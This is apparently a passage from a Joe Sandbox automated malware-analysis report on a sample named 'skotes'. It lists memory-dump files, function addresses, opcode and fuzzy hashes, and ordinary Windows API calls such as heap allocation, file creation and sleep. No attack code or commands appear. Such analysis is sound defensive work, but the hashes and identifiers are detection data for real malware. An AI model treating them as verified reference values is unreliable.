Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0c610c0e3bf85bb4bac44e9186ed0c6ec73a02fe5d401c107f6b498c9a04814c
Instruction ID: 4eb35b56e27b1313a8badb1a224aa9e3e9933e424418d0a07fae6039ff1edd0b
Opcode Fuzzy Hash: 0c610c0e3bf85bb4bac44e9186ed0c6ec73a02fe5d401c107f6b498c9a04814c
Instruction Fuzzy Hash: 5BF05E33657225A6EB216AA69C05BDB777DDFC6770B19C521AD0CA7181DA20E80086E2

Function 0097B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,9CBA457E,?,?,0095D3FC,9CBA457E,?,00957A8B,?,?,?,?,?,?,00947465,?), ref: 0097B07D

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 617adf3e9e0f3da53f151941ae28f22bfb3dfa07a2f50fea23c67964c217c91d
Instruction ID: cb9fb3e3c165945453cf2a42b2adcf921e7165347750d439fc3a3091f3636494
Opcode Fuzzy Hash: 617adf3e9e0f3da53f151941ae28f22bfb3dfa07a2f50fea23c67964c217c91d
Instruction Fuzzy Hash: ACE0923714622596EB3132759C01B5FB64C9FC23B0F26D620FD7CA61E4DB10EC0081E5

Function 00981775 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00981B65,?,?,00000000,?,00981B65,00000000,0000000C), ref: 00981792

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3fdd94e2c1358055b82ca643824cc50bb1c768f58e7bfa2e9f9aea96352222ff
Instruction ID: 3b85369d855342ed98f437deacec3418ae8b057397189090f9b5ea8f30421794
Opcode Fuzzy Hash: 3fdd94e2c1358055b82ca643824cc50bb1c768f58e7bfa2e9f9aea96352222ff
Instruction Fuzzy Hash: 86D0923204010DBFDF129E85DC42EEA3BAAFB48714F014110FE5866060C772E832AB94

Function 00956C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00956CF5

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ae747c26da2860224ea20ecb6e76c5e76ad8bd76a1c67db99cb77ba911d294a6
Instruction ID: dfa63495d29c7f22a29f9d40594ff863695afe747df1f68b8fa97e234b52a8ad
Opcode Fuzzy Hash: ae747c26da2860224ea20ecb6e76c5e76ad8bd76a1c67db99cb77ba911d294a6
Instruction Fuzzy Hash: BCF08171A14614ABC601BBAD9D02B1EBB74AB87B65F800658EC21672D2EA345A0447D2

Function 04FE0DDD Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3002918524.0000000004FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4fe0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 191d34f0d110dbdaba411b0e1a563d0f7f5166af8e84a3e0258e6c2ffce5fde7
Instruction ID: 864b4ec44163aa66d57cb6e6798948822aa474c6296893e861497a3bdf401678
Opcode Fuzzy Hash: 191d34f0d110dbdaba411b0e1a563d0f7f5166af8e84a3e0258e6c2ffce5fde7
Instruction Fuzzy Hash: B6D05E7B60D328EEA252A5533E146FE2354EAD52223748477F441D5100EE98AA1BA360

Function 04FE0DE9 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3002918524.0000000004FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4fe0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ff8a6414ea91b37abbfd94012e5cd94005469c3054f3dbc84a835f828d6eeb
Instruction ID: b2bfc88bfccd1d8f4056e29e914c65ad8fc3fd41524b8b59309b2bd29ffd2959
Opcode Fuzzy Hash: 88ff8a6414ea91b37abbfd94012e5cd94005469c3054f3dbc84a835f828d6eeb
Instruction Fuzzy Hash: 76D0127B34C221DE624290D33B0467A6755E7D2732374C473F042D5001EC99DA2BB330

Non-executed Functions

Function 00960E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00960F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00960F62

Part of subcall function 0096265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00962750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00960FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00960FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0096103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0096106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 009610C1

Strings

(, xrefs: 00960F22

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
